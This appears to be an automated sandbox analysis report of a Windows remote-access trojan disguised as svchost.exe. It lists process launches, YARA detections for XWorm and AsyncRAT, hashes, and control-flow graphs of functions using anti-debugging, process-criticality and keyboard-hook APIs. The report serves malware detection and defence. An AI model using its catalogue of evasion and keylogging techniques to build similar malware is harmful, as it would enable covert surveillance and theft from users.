                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:15:05:06
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0x240000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 76%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:15:05:18
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                Imagebase:0x3a0000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:15:05:26
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                Imagebase:0xa40000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:15:06:01
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0xa0000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:15:07:01
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0xa20000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:15:08:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0x60000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:15:09:00
                                                Start date:23/11/2024
                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                Imagebase:0xc70000
                                                File size:85'504 bytes
                                                MD5 hash:F5869349B4C3C5902601673CCB454F8C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Disassembly

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:20.4%
                                                  Dynamic/Decrypted Code Coverage:100%
                                                  Signature Coverage:33.3%
                                                  Total number of Nodes:9
                                                  Total number of Limit Nodes:0

                                                  Executed Functions

                                                  Function 00007FFD9B8BFD04 Relevance: 2.3, Strings: 1, Instructions: 1036COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 7ffd9b8bfd04-7ffd9b8bfd55 call 7ffd9b8b0aa0 6 7ffd9b8bfd57-7ffd9b8bfd74 0->6 7 7ffd9b8bfdcb 0->7 9 7ffd9b8bfdd0-7ffd9b8bfde5 6->9 10 7ffd9b8bfd76-7ffd9b8bfdc6 call 7ffd9b8bd550 6->10 7->9 12 7ffd9b8bfde7-7ffd9b8bfdfe call 7ffd9b8b1288 call 7ffd9b8b0ab0 9->12 13 7ffd9b8bfe03-7ffd9b8bfe18 9->13 34 7ffd9b8c0a0b-7ffd9b8c0a19 10->34 12->34 20 7ffd9b8bfe1a-7ffd9b8bfe4a call 7ffd9b8b1288 13->20 21 7ffd9b8bfe4f-7ffd9b8bfe64 13->21 20->34 29 7ffd9b8bfe77-7ffd9b8bfe8c 21->29 30 7ffd9b8bfe66-7ffd9b8bfe72 call 7ffd9b8be9a8 21->30 38 7ffd9b8bfe8e-7ffd9b8bfe91 29->38 39 7ffd9b8bfed2-7ffd9b8bfee7 29->39 30->34 38->7 41 7ffd9b8bfe97-7ffd9b8bfea2 38->41 45 7ffd9b8bff28-7ffd9b8bff3d 39->45 46 7ffd9b8bfee9-7ffd9b8bfeec 39->46 41->7 42 7ffd9b8bfea8-7ffd9b8bfecd call 7ffd9b8b0a88 call 7ffd9b8be9a8 41->42 42->34 53 7ffd9b8bff6a-7ffd9b8bff7f 45->53 54 7ffd9b8bff3f-7ffd9b8bff42 45->54 46->7 48 7ffd9b8bfef2-7ffd9b8bfefd 46->48 48->7 51 7ffd9b8bff03-7ffd9b8bff23 call 7ffd9b8b0a88 call 7ffd9b8ba768 48->51 51->34 62 7ffd9b8c0057-7ffd9b8c006c 53->62 63 7ffd9b8bff85-7ffd9b8bffd1 call 7ffd9b8b0a10 53->63 54->7 57 7ffd9b8bff48-7ffd9b8bff65 call 7ffd9b8b0a88 call 7ffd9b8ba770 54->57 57->34 71 7ffd9b8c008b-7ffd9b8c00a0 62->71 72 7ffd9b8c006e-7ffd9b8c0071 62->72 63->7 97 7ffd9b8bffd7-7ffd9b8c000f call 7ffd9b8b7870 63->97 81 7ffd9b8c00c2-7ffd9b8c00d7 71->81 82 7ffd9b8c00a2-7ffd9b8c00a5 71->82 72->7 74 7ffd9b8c0077-7ffd9b8c0086 call 7ffd9b8ba748 72->74 74->34 87 7ffd9b8c00f7-7ffd9b8c010c 81->87 88 7ffd9b8c00d9-7ffd9b8c00f2 81->88 82->7 83 7ffd9b8c00ab-7ffd9b8c00bd call 7ffd9b8ba748 82->83 83->34 94 7ffd9b8c012c-7ffd9b8c0141 87->94 95 7ffd9b8c010e-7ffd9b8c0127 87->95 88->34 101 7ffd9b8c0143-7ffd9b8c015c 94->101 102 7ffd9b8c0161-7ffd9b8c0176 94->102 95->34 97->7 114 7ffd9b8c0015-7ffd9b8c0052 call 7ffd9b8be9d8 97->114 101->34 106 7ffd9b8c0178-7ffd9b8c017b 102->106 107 7ffd9b8c019f-7ffd9b8c01b4 102->107 106->7 109 7ffd9b8c0181-7ffd9b8c019a 106->109 115 7ffd9b8c01ba-7ffd9b8c0232 107->115 116 7ffd9b8c0254-7ffd9b8c0269 107->116 109->34 114->34 115->7 146 7ffd9b8c0238-7ffd9b8c024f 115->146 122 7ffd9b8c026b-7ffd9b8c027c 116->122 123 7ffd9b8c0281-7ffd9b8c0296 116->123 122->34 130 7ffd9b8c0336-7ffd9b8c034b 123->130 131 7ffd9b8c029c-7ffd9b8c02b7 123->131 137 7ffd9b8c034d-7ffd9b8c035e 130->137 138 7ffd9b8c0363-7ffd9b8c0378 130->138 140 7ffd9b8c02db-7ffd9b8c0314 131->140 141 7ffd9b8c02b9-7ffd9b8c02d9 131->141 137->34 148 7ffd9b8c03aa-7ffd9b8c03bf 138->148 149 7ffd9b8c037a-7ffd9b8c03a5 call 7ffd9b8b0da0 call 7ffd9b8bd550 138->149 140->7 158 7ffd9b8c031a-7ffd9b8c0331 140->158 141->140 146->34 155 7ffd9b8c03c5-7ffd9b8c0497 call 7ffd9b8b0da0 call 7ffd9b8bd550 148->155 156 7ffd9b8c049c-7ffd9b8c04b1 148->156 149->34 155->34 165 7ffd9b8c0578-7ffd9b8c058d 156->165 166 7ffd9b8c04b7-7ffd9b8c04ba 156->166 158->34 174 7ffd9b8c058f-7ffd9b8c059c call 7ffd9b8bd550 165->174 175 7ffd9b8c05a1-7ffd9b8c05b6 165->175 167 7ffd9b8c04c0-7ffd9b8c04cb 166->167 168 7ffd9b8c056d-7ffd9b8c0572 166->168 167->168 171 7ffd9b8c04d1-7ffd9b8c056b call 7ffd9b8b0da0 call 7ffd9b8bd550 167->171 176 7ffd9b8c0573 168->176 171->176 174->34 183 7ffd9b8c05b8-7ffd9b8c05c9 175->183 184 7ffd9b8c062d-7ffd9b8c0642 175->184 176->34 183->7 193 7ffd9b8c05cf-7ffd9b8c05df call 7ffd9b8b0a80 183->193 190 7ffd9b8c0644-7ffd9b8c0647 184->190 191 7ffd9b8c0682-7ffd9b8c0697 184->191 190->7 195 7ffd9b8c064d-7ffd9b8c067d call 7ffd9b8b0a78 call 7ffd9b8b0a88 call 7ffd9b8ba720 190->195 206 7ffd9b8c0699-7ffd9b8c06c6 call 7ffd9b8b8e70 call 7ffd9b8bb1a0 191->206 207 7ffd9b8c06dd-7ffd9b8c06f2 191->207 201 7ffd9b8c060b-7ffd9b8c0628 call 7ffd9b8b0a80 call 7ffd9b8b0a88 call 7ffd9b8ba720 193->201 202 7ffd9b8c05e1-7ffd9b8c0606 call 7ffd9b8bd550 193->202 195->34 201->34 202->34 236 7ffd9b8c06cb-7ffd9b8c06d8 call 7ffd9b8ba728 206->236 222 7ffd9b8c06f8-7ffd9b8c078d call 7ffd9b8b0da0 call 7ffd9b8bd550 207->222 223 7ffd9b8c0792-7ffd9b8c07a7 207->223 222->34 223->34 235 7ffd9b8c07ad-7ffd9b8c07b4 223->235 241 7ffd9b8c07c7-7ffd9b8c0888 call 7ffd9b8be9f8 call 7ffd9b8bea08 call 7ffd9b8bea18 call 7ffd9b8bea28 call 7ffd9b8bb0b0 235->241 242 7ffd9b8c07b6-7ffd9b8c07c0 call 7ffd9b8be9e8 235->242 236->34 241->34 242->241
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID: 0-3916222277
                                                  • Opcode ID: 06ca8d5beb31e5e9f902505b823cf4ac73a72730db64c2ef83f1af88ec89fe84
                                                  • Instruction ID: 7ab082676354088451b8238080946ca3402f52e1389b92c30acebc47419cac19
                                                  • Opcode Fuzzy Hash: 06ca8d5beb31e5e9f902505b823cf4ac73a72730db64c2ef83f1af88ec89fe84
                                                  • Instruction Fuzzy Hash: F9727520F2D91E4BEBA8FB788465A7973D2EF98344F554979D01EC32D6DD28E8028B41
                                                  Function 00007FFD9B8B7BE1 Relevance: 1.6, APIs: 1, Instructions: 124COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 304 7ffd9b8b7be1-7ffd9b8b7c9d CheckRemoteDebuggerPresent 308 7ffd9b8b7ca5-7ffd9b8b7ce8 304->308 309 7ffd9b8b7c9f 304->309 309->308
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID: CheckDebuggerPresentRemote
                                                  • String ID:
                                                  • API String ID: 3662101638-0
                                                  • Opcode ID: a98fe62331017f7159e9a95bb198a6f5c73f3473aa90c6bc27307d6a4a3abd72
                                                  • Instruction ID: a2bcb3c1f48289cf63f9b9e70ce6d439811a581d838aa403f00363f06b63ae6b
                                                  • Opcode Fuzzy Hash: a98fe62331017f7159e9a95bb198a6f5c73f3473aa90c6bc27307d6a4a3abd72
                                                  • Instruction Fuzzy Hash: 4131E23190875C8FCB58DF58C84A6E97BE0EF65321F0542ABD489D7292DB34A846CB91
                                                  Function 00007FFD9B8B1779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 353 7ffd9b8b1779-7ffd9b8b17b0 355 7ffd9b8b20e7-7ffd9b8b212e 353->355 356 7ffd9b8b17b6-7ffd9b8b1994 call 7ffd9b8b0650 * 13 call 7ffd9b8b0aa8 353->356 417 7ffd9b8b1996-7ffd9b8b199d 356->417 418 7ffd9b8b199e-7ffd9b8b1a10 call 7ffd9b8b04b8 call 7ffd9b8b0358 call 7ffd9b8b0368 356->418 417->418 431 7ffd9b8b1a23-7ffd9b8b1a33 418->431 432 7ffd9b8b1a12-7ffd9b8b1a1c 418->432 435 7ffd9b8b1a35-7ffd9b8b1a54 call 7ffd9b8b0358 431->435 436 7ffd9b8b1a5b-7ffd9b8b1a7b 431->436 432->431 435->436 442 7ffd9b8b1a8c-7ffd9b8b1ab7 436->442 443 7ffd9b8b1a7d-7ffd9b8b1a87 call 7ffd9b8b0378 436->443 448 7ffd9b8b1ab9-7ffd9b8b1ac2 442->448 449 7ffd9b8b1ac3-7ffd9b8b1af0 call 7ffd9b8b1098 442->449 443->442 448->449 455 7ffd9b8b1af6-7ffd9b8b1b8b 449->455 456 7ffd9b8b1b90-7ffd9b8b1c1e 449->456 475 7ffd9b8b1c25-7ffd9b8b1d63 call 7ffd9b8b0870 call 7ffd9b8b1300 call 7ffd9b8b0388 call 7ffd9b8b0398 455->475 456->475 499 7ffd9b8b1d65-7ffd9b8b1d98 475->499 500 7ffd9b8b1db1-7ffd9b8b1de4 475->500 499->500 507 7ffd9b8b1d9a-7ffd9b8b1da7 499->507 510 7ffd9b8b1de6-7ffd9b8b1e07 500->510 511 7ffd9b8b1e09-7ffd9b8b1e39 500->511 507->500 512 7ffd9b8b1da9-7ffd9b8b1daf 507->512 514 7ffd9b8b1e41-7ffd9b8b1e78 510->514 511->514 512->500 520 7ffd9b8b1e7a-7ffd9b8b1e9b 514->520 521 7ffd9b8b1e9d-7ffd9b8b1ecd 514->521 523 7ffd9b8b1ed5-7ffd9b8b1fb2 call 7ffd9b8b03a8 call 7ffd9b8b0a48 520->523 521->523 539 7ffd9b8b1fb9-7ffd9b8b1ff9 523->539 540 7ffd9b8b1fb4-7ffd9b8b1fb7 523->540 545 7ffd9b8b1ffc 539->545 540->539 546 7ffd9b8b201b-7ffd9b8b205b 545->546 547 7ffd9b8b1ffe-7ffd9b8b2010 call 7ffd9b8b1098 545->547 546->545 558 7ffd9b8b205d-7ffd9b8b20c7 546->558 555 7ffd9b8b2017 call 7ffd9b8b04b0 547->555 556 7ffd9b8b2012 call 7ffd9b8b1280 547->556 555->546 556->555 567 7ffd9b8b20ce-7ffd9b8b20e6 558->567
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eca122cae10bd49c6c73a9d69bcd17f4bb1ef8ebf9fc9bce249b62ff6fbde38d
                                                  • Instruction ID: 16e79e1ba4a02c338d70e55447a893283a8c4a6cab86535c5522494b0525c7eb
                                                  • Opcode Fuzzy Hash: eca122cae10bd49c6c73a9d69bcd17f4bb1ef8ebf9fc9bce249b62ff6fbde38d
                                                  • Instruction Fuzzy Hash: 5452B621F29A594FE758FB7C9879679B6D2FF9C300F4405B9E05DC32D6DE28A8018781
                                                  Function 00007FFD9B8B6226 Relevance: .5, Instructions: 471COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 691 7ffd9b8b6226-7ffd9b8b6233 692 7ffd9b8b6235-7ffd9b8b623d 691->692 693 7ffd9b8b623e-7ffd9b8b6307 691->693 692->693 697 7ffd9b8b6309-7ffd9b8b6312 693->697 698 7ffd9b8b6373 693->698 697->698 699 7ffd9b8b6314-7ffd9b8b6320 697->699 700 7ffd9b8b6375-7ffd9b8b639a 698->700 701 7ffd9b8b6359-7ffd9b8b6371 699->701 702 7ffd9b8b6322-7ffd9b8b6334 699->702 707 7ffd9b8b6406 700->707 708 7ffd9b8b639c-7ffd9b8b63a5 700->708 701->700 703 7ffd9b8b6338-7ffd9b8b634b 702->703 704 7ffd9b8b6336 702->704 703->703 706 7ffd9b8b634d-7ffd9b8b6355 703->706 704->703 706->701 709 7ffd9b8b6408-7ffd9b8b64b0 707->709 708->707 710 7ffd9b8b63a7-7ffd9b8b63b3 708->710 721 7ffd9b8b651e 709->721 722 7ffd9b8b64b2-7ffd9b8b64bc 709->722 711 7ffd9b8b63b5-7ffd9b8b63c7 710->711 712 7ffd9b8b63ec-7ffd9b8b6404 710->712 714 7ffd9b8b63cb-7ffd9b8b63de 711->714 715 7ffd9b8b63c9 711->715 712->709 714->714 716 7ffd9b8b63e0-7ffd9b8b63e8 714->716 715->714 716->712 723 7ffd9b8b6520-7ffd9b8b6549 721->723 722->721 724 7ffd9b8b64be-7ffd9b8b64cb 722->724 731 7ffd9b8b654b-7ffd9b8b6556 723->731 732 7ffd9b8b65b3 723->732 725 7ffd9b8b64cd-7ffd9b8b64df 724->725 726 7ffd9b8b6504-7ffd9b8b651c 724->726 728 7ffd9b8b64e3-7ffd9b8b64f6 725->728 729 7ffd9b8b64e1 725->729 726->723 728->728 730 7ffd9b8b64f8-7ffd9b8b6500 728->730 729->728 730->726 731->732 733 7ffd9b8b6558-7ffd9b8b6566 731->733 734 7ffd9b8b65b5-7ffd9b8b6646 732->734 735 7ffd9b8b6568-7ffd9b8b657a 733->735 736 7ffd9b8b659f-7ffd9b8b65b1 733->736 742 7ffd9b8b664c-7ffd9b8b665b 734->742 738 7ffd9b8b657c 735->738 739 7ffd9b8b657e-7ffd9b8b6591 735->739 736->734 738->739 739->739 740 7ffd9b8b6593-7ffd9b8b659b 739->740 740->736 743 7ffd9b8b665d 742->743 744 7ffd9b8b6663-7ffd9b8b66c8 call 7ffd9b8b66e4 742->744 743->744 751 7ffd9b8b66ca 744->751 752 7ffd9b8b66cf-7ffd9b8b66e3 744->752 751->752
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7407ad11bf2571e0a165fac4b89396cdffb3d491e8c39d604f05072e2c7b4127
                                                  • Instruction ID: 8e0b1ec8e0b867d095c7371c3042a9b8aaf9b6ae40353f801e09f8123fe764b8
                                                  • Opcode Fuzzy Hash: 7407ad11bf2571e0a165fac4b89396cdffb3d491e8c39d604f05072e2c7b4127
                                                  • Instruction Fuzzy Hash: BEF1C470A09A4D8FEBA8DF28C855BE977D1FF58310F04426EE84DC72A5DB34D9458B82
                                                  Function 00007FFD9B8B6FD2 Relevance: .5, Instructions: 458COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 753 7ffd9b8b6fd2-7ffd9b8b6fdf 754 7ffd9b8b6fea-7ffd9b8b70b7 753->754 755 7ffd9b8b6fe1-7ffd9b8b6fe9 753->755 759 7ffd9b8b70b9-7ffd9b8b70c2 754->759 760 7ffd9b8b7123 754->760 755->754 759->760 761 7ffd9b8b70c4-7ffd9b8b70d0 759->761 762 7ffd9b8b7125-7ffd9b8b714a 760->762 763 7ffd9b8b7109-7ffd9b8b7121 761->763 764 7ffd9b8b70d2-7ffd9b8b70e4 761->764 769 7ffd9b8b71b6 762->769 770 7ffd9b8b714c-7ffd9b8b7155 762->770 763->762 765 7ffd9b8b70e8-7ffd9b8b70fb 764->765 766 7ffd9b8b70e6 764->766 765->765 768 7ffd9b8b70fd-7ffd9b8b7105 765->768 766->765 768->763 772 7ffd9b8b71b8-7ffd9b8b71dd 769->772 770->769 771 7ffd9b8b7157-7ffd9b8b7163 770->771 773 7ffd9b8b7165-7ffd9b8b7177 771->773 774 7ffd9b8b719c-7ffd9b8b71b4 771->774 779 7ffd9b8b724b 772->779 780 7ffd9b8b71df-7ffd9b8b71e9 772->780 775 7ffd9b8b717b-7ffd9b8b718e 773->775 776 7ffd9b8b7179 773->776 774->772 775->775 778 7ffd9b8b7190-7ffd9b8b7198 775->778 776->775 778->774 781 7ffd9b8b724d-7ffd9b8b727b 779->781 780->779 782 7ffd9b8b71eb-7ffd9b8b71f8 780->782 788 7ffd9b8b72eb 781->788 789 7ffd9b8b727d-7ffd9b8b7288 781->789 783 7ffd9b8b71fa-7ffd9b8b720c 782->783 784 7ffd9b8b7231-7ffd9b8b7249 782->784 786 7ffd9b8b7210-7ffd9b8b7223 783->786 787 7ffd9b8b720e 783->787 784->781 786->786 790 7ffd9b8b7225-7ffd9b8b722d 786->790 787->786 792 7ffd9b8b72ed-7ffd9b8b73c5 788->792 789->788 791 7ffd9b8b728a-7ffd9b8b7298 789->791 790->784 793 7ffd9b8b729a-7ffd9b8b72ac 791->793 794 7ffd9b8b72d1-7ffd9b8b72e9 791->794 802 7ffd9b8b73cb-7ffd9b8b73da 792->802 795 7ffd9b8b72b0-7ffd9b8b72c3 793->795 796 7ffd9b8b72ae 793->796 794->792 795->795 799 7ffd9b8b72c5-7ffd9b8b72cd 795->799 796->795 799->794 803 7ffd9b8b73dc 802->803 804 7ffd9b8b73e2-7ffd9b8b7444 call 7ffd9b8b7460 802->804 803->804 811 7ffd9b8b7446 804->811 812 7ffd9b8b744b-7ffd9b8b745f 804->812 811->812
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a6a3b732ba7bf305f0fc1f053bc3b53d28f659eb2b9113bfa448bd35a5c1ed3a
                                                  • Instruction ID: 144aa40177624009f6ec66ecd65402f74926dc148d5b255ccd520ed68c25464e
                                                  • Opcode Fuzzy Hash: a6a3b732ba7bf305f0fc1f053bc3b53d28f659eb2b9113bfa448bd35a5c1ed3a
                                                  • Instruction Fuzzy Hash: 26E1C530A09A4E8FEBA8DF28C8657E977E1FF58310F04426EE84DC7295DE7499418BC1
                                                  Function 00007FFD9B8B24F1 Relevance: .4, Instructions: 391COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5661e4ebee25088655144d320226359cb8b61ebc13b8fde13fcc24f7aa4e6756
                                                  • Instruction ID: c84cc7c42140d46f2858030b15f081172e5d4e11600c561d16a1d85062fcb453
                                                  • Opcode Fuzzy Hash: 5661e4ebee25088655144d320226359cb8b61ebc13b8fde13fcc24f7aa4e6756
                                                  • Instruction Fuzzy Hash: BAC1C320B1D95D4FEB98EBBC94756B97BD2EF9C300F050579E05DC32E6DE28A9024B81
                                                  Function 00007FFD9B8B2259 Relevance: .2, Instructions: 203COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 178008a426a93917e5dfcfc9385e01b8606b46a89f48d0b2bcfba2c47517dc69
                                                  • Instruction ID: 27585600fc17224b8616496a263ed9bb75a5cfe6290b28f599fcc319fabd77d4
                                                  • Opcode Fuzzy Hash: 178008a426a93917e5dfcfc9385e01b8606b46a89f48d0b2bcfba2c47517dc69
                                                  • Instruction Fuzzy Hash: A951FF11B0E6C90FD796ABB85835675BFE0DF9B219B0800FBE099C71E7DD081806C382
                                                  Function 00007FFD9B8B97AD Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 283 7ffd9b8b97ad-7ffd9b8b9890 RtlSetProcessIsCritical 287 7ffd9b8b9898-7ffd9b8b98cd 283->287 288 7ffd9b8b9892 283->288 288->287
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID: CriticalProcess
                                                  • String ID:
                                                  • API String ID: 2695349919-0
                                                  • Opcode ID: a3874d571839e4d56ff6839a0350e6dfee1ca8854a0a78ac3f5e230f87dc7827
                                                  • Instruction ID: a1f1202517d4263ff0b02294a84e7802302e51a61216bd2b05d6769c04c4fca1
                                                  • Opcode Fuzzy Hash: a3874d571839e4d56ff6839a0350e6dfee1ca8854a0a78ac3f5e230f87dc7827
                                                  • Instruction Fuzzy Hash: F541043190C6598FDB19DFA8D855BE97BF0FF56310F04416ED08AC3692CB346846CB91
                                                  Function 00007FFD9B8B9F68 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 290 7ffd9b8b9f68-7ffd9b8b9f6f 291 7ffd9b8b9f7a-7ffd9b8b9fed 290->291 292 7ffd9b8b9f71-7ffd9b8b9f79 290->292 296 7ffd9b8ba079-7ffd9b8ba07d 291->296 297 7ffd9b8b9ff3-7ffd9b8b9ff8 291->297 292->291 298 7ffd9b8ba002-7ffd9b8ba03f SetWindowsHookExW 296->298 299 7ffd9b8b9fff-7ffd9b8ba000 297->299 300 7ffd9b8ba047-7ffd9b8ba078 298->300 301 7ffd9b8ba041 298->301 299->298 301->300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4146297658.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_7ffd9b8b0000_WV7Gj9lJ7W.jbxd
                                                  Similarity
                                                  • API ID: HookWindows
                                                  • String ID:
                                                  • API String ID: 2559412058-0
                                                  • Opcode ID: 0017aed796659ea2126ae7774436c0a4a0754a05326038b24b4041b57850018b
                                                  • Instruction ID: bb44f184603da9c8eac47790bff5ea28c87c16079486c48c8bda253a56692ce8
                                                  • Opcode Fuzzy Hash: 0017aed796659ea2126ae7774436c0a4a0754a05326038b24b4041b57850018b
                                                  • Instruction Fuzzy Hash: 2741E731A1CA5D8FDB58DB6C98566F97BE1EB59321F00427ED049C3292DE74A812CBC1

                                                  Executed Functions

                                                  Function 00007FFD9B881779 Relevance: .9, Instructions: 907COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1795322412.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_7ffd9b880000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
